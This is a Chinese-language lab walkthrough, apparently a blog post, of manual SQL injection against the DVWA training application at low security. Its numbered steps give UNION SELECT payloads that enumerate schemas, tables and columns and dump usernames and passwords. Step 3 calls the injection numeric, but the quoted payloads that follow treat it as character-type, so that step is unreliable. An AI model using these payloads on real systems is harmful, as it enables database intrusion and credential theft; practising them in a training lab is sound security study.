1,将dvwa的安全等级改为low
2,查看源代码,发现没有过滤
3,输入1,判断注入类型是数字型还是字符型
发现返回,得知是数字型。
4,1’ 报错得知存在注入点
5,输入1’ order by 1#
6,输入1’ order by 2#
7,输入 1’ order by 3# 报错,得知字段不超过3。
8,输入 1’ union select 1,2# 返回1和2
9,输入 1’ union select database(),version()# 返回数据库和版本信息。
10,输入 1’ union select schema_name,2 from information_schema.schemata limit 0,1# 返回第0行取1行内容 返回数据库
11,输入 1’ union select schema_name,2 from information_schema.schemata limit 1,1#
12,输入 1’ union select schema_name,2 from information_schema.schemata limit 2,1#
13,输入 1’ union select schema_name,2 from information_schema.schemata limit 3,1#
14,输入 1’ union select schema_name,2 from information_schema.schemata limit 4,1#
15,输入 1’ union select schema_name,2 from information_schema.schemata limit 5,1#
16,输入 1’ union select table_name,2 from information_schema.tables where table_schema=‘dvwa’# 返回表
17,输入 1’ union select column_name,column_type from information_schema.columns where table_name=‘users’# 返回字段内容
18,输入 1’ union select concat(user,’-’,password),2 from dvwa.users# 返回用户名和密码
相关文章: